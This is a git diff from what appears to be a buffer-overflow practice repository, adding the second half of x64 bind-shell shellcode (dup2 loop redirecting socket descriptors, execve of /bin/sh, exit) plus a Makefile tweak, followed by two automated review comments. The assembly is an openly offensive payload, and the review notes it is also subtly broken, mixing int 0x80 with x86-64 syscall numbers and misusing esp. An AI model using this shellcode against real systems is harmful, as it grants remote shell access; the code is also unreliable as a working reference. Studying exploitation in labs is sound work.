-rw-r--r-- | .gitignore | 1 | ||||
-rw-r--r-- | Makefile | 2 | ||||
-rw-r--r-- | shellcode/socket_x64.asm | 32 |
3 files changed, 34 insertions, 1 deletions
@@ -1,3 +1,4 @@
+*.swp
*.o
overflow
overflow_x64
@@ -31,7 +31,7 @@ disable-prot:
%.o : %.c
$(CC) $(CFLAGS) $(X86_FLAGS) $(OCFLAGS) -o $(patsubst %.o,%,$@) $<
- $(CC) $(CFLAGS) $(X64_FLAGS) $(OCFLAGS) -o $(patsubst %.o,%,$@)_x64 $<
+ -$(CC) $(CFLAGS) $(X64_FLAGS) $(OCFLAGS) -o $(patsubst %.o,%,$@)_x64 $<
ln -s $< $@
clean:
diff --git a/shellcode/socket_x64.asm b/shellcode/socket_x64.asm
index 65238e3..131fefa 100644
--- a/shellcode/socket_x64.asm
+++ b/shellcode/socket_x64.asm
@@ -39,3 +39,35 @@ mov rsi,rsp ; save stack pointer (pointer to struct sockaddr_in)
mov al,0x2B ; accept() syscall
int 0x80
+; dup2()
+xor rcx,rcx
+mov cl,0x3 ; loop count
+dupes:
+xor rsi,rsi
+dec cl ; loop var
+mov rsi,rcx ; loop var -> newfd
+xor rax,rax
+mov al,0x21 ; dup2() syscall
+int 0x80
+inc cl
+loop dupes
+
+; exec
+mov rax,0x68732f6e69622f2f ; string 'hs/nib//'
+push rax ; push the string onto the stack
+mov rdi,rsp ; arg1 = pointer to string
+xor rax,rax
+push rax ; arg2 = null
+mov rsi,rsp
+push rax ; arg3 = null
+mov rdx,rsp
+mov byte [esp + 8],al ; null-terminate the string
+mov al,0x3b ; exec() syscall
+int 0x80
+
+; exit()
+xor rax,rax
+xor rdi,rdi
+mov dil,0x42 ; return code (66d)
+mov al,0x3c ; exit() syscall
+int 0x80 |
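Review bot: Prefixing the x64 compile line with `-` tells make to discard that command's exit status, so a failing `$(CC) ... -o $(patsubst %.o,%,$@)_x64 $<` no longer stops the `%.o : %.c` rule; the recipe proceeds to `ln -s $< $@` and the build reports success with the `_x64` binary missing or stale. If the goal is to tolerate hosts without an x86-64 toolchain (inferred, the commit does not say), it is safer to make that explicit than to silence every error: put the x64 build in its own target that the default goal can skip, or guard the command so it runs only when the toolchain flags are set, leaving a genuine compile error visible. At minimum a recipe comment such as `# x64 build is best-effort: failure here does not fail the rule` should state the intent next to the `-`.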
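Review bot: `mov byte [esp + 8],al` uses the 32-bit `esp` as the base in 64-bit code, so the effective address is the stack pointer truncated to its low 32 bits rather than the stack slot the comment describes; the comment is also wrong about what lives there, because after the three pushes `[rsp + 8]` is the zero qword pushed as arg2 and the string pushed two slots earlier is already terminated by that qword, so the store is at best redundant. Across the added block the syscall numbers (0x21, 0x3b, 0x3c) and argument registers (`rdi`/`rsi`/`rdx`, `dil`) follow the x86-64 convention while the entry instruction is `int 0x80`, which on an x86-64 kernel dispatches through the 32-bit compatibility table with its own numbering and `ebx`/`ecx`/`edx` arguments; the pre-existing `mov al,0x2B` / `int 0x80` context lines share the same mismatch, so the file should commit to one ABI and state it in a header comment (target, entry instruction, argument registers, clobbers). The `dupes:` loop is correct but relies on `dec cl`/`inc cl` bracketing the body so that `loop` sees an undisturbed count; a comment such as `; rcx = iterations left, cl-1 = newfd for this pass` at the label would make that invariant readable. The enclosing routine starts before this hunk.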